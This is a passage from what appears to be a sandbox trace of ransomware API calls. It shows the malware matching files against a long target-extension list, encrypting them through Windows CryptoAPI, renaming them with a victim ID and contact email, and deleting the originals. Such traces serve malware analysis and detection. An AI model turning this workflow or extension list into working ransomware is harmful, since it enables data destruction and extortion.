7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0159.012] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0159.013] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0159.013] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0159.017] ReadFile (in: hFile=0x39c, lpBuffer=0xfdf190, nNumberOfBytesToRead=0x5765, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdf190*, lpNumberOfBytesRead=0x189930*=0x5765, lpOverlapped=0x0) returned 1
	[0159.021] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.022] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcaf78) returned 1
	[0159.024] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.025] CryptCreateHash (in: hProv=0xfcaf78, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0159.026] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.026] CryptHashData (hHash=0xfb9570, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0159.026] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.026] CryptDeriveKey (in: hProv=0xfcaf78, Algid=0x6610, hBaseData=0xfb9570, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb9030) returned 1
	[0159.026] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.026] CryptEncrypt (in: hKey=0xfb9030, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x5765, dwBufLen=0x5765 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x5770) returned 1
	[0159.028] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0159.028] RtlMoveMemory (in: Destination=0xfe4900, Source=0xfdf190, Length=0x5765 | out: Destination=0xfe4900) 
	[0159.028] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.028] CryptEncrypt (in: hKey=0xfb9030, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe4900*, pdwDataLen=0x1894dc*=0x5765, dwBufLen=0x5770 | out: pbData=0xfe4900*, pdwDataLen=0x1894dc*=0x5770) returned 1
	[0159.029] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.029] CryptDestroyKey (hKey=0xfb9030) returned 1
	[0159.030] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.030] CryptDestroyHash (hHash=0xfb9570) returned 1
	[0159.030] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.030] CryptReleaseContext (hProv=0xfcaf78, dwFlags=0x0) returned 1
	[0159.030] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0159.031] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0159.031] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.031] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0159.033] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 154
	[0159.033] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0159.034] WriteFile (in: hFile=0x3a0, lpBuffer=0xfe4900*, nNumberOfBytesToWrite=0x5770, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfe4900*, lpNumberOfBytesWritten=0x189938*=0x5770, lpOverlapped=0x0) returned 1
	[0159.038] CloseHandle (hObject=0x3a0) returned 1
	[0159.049] CloseHandle (hObject=0x39c) returned 1
	[0159.049] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml")) returned 1
	[0159.054] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml")) returned 0
	[0159.054] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b5f1a63, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f1a63, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="s321033.hash", cAlternateFileName="S32103~1.HAS")) returned 1
	[0159.055] lstrcmpW (lpString1="s321033.hash", lpString2="..") returned 1
	[0159.055] lstrcmpW (lpString1="s321033.hash", lpString2=".") returned 1
	[0159.055] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\"
	[0159.055] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\", lpString2="s321033.hash" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\s321033.hash") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\s321033.hash"
	[0159.055] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\s321033.hash") returned 98
	[0159.055] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0159.056] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\s321033.hash", cchLength=0x62 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\s321033.hash") returned 0x62
	[0159.057] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.057] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\s321033.hash", lpSrch="help_decrypt_your_files") returned 0x0
	[0159.057] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\s321033.hash" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\s321033.hash") returned="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\s321033.hash"
	[0159.057] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\s321033.hash") returned 98
	[0159.057] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0159.058] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.058] StrStrW (lpFirst=".hash", lpSrch=".") returned=".hash"
	[0159.058] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.058] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hash") returned 0x0
	[0159.058] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b5f2f99, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f2f99, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x21ebc700, ftLastWriteTime.dwHighDateTime=0x1d0d7ef, nFileSizeHigh=0x0, nFileSizeLow=0xd81d4, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1
	[0159.059] lstrcmpW (lpString1="stream.x86.en-us.man.dat", lpString2="..") returned 1
	[0159.059] lstrcmpW (lpString1="stream.x86.en-us.man.dat", lpString2=".") returned 1
	[0159.059] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\"
	[0159.059] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\", lpString2="stream.x86.en-us.man.dat" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\stream.x86.en-us.man.dat") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\stream.x86.en-us.man.dat"
	[0159.059] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\stream.x86.en-us.man.dat") returned 110
	[0159.059] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0159.059] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\stream.x86.en-us.man.dat", cchLength=0x6e | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat") returned 0x6e
	[0159.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.060] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat", lpSrch="help_decrypt_your_files") returned 0x0
	[0159.060] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat") returned="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat"
	[0159.060] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat") returned 110
	[0159.060] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0159.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.061] StrStrW (lpFirst=".dat", lpSrch=".") returned=".dat"
	[0159.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.061] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.p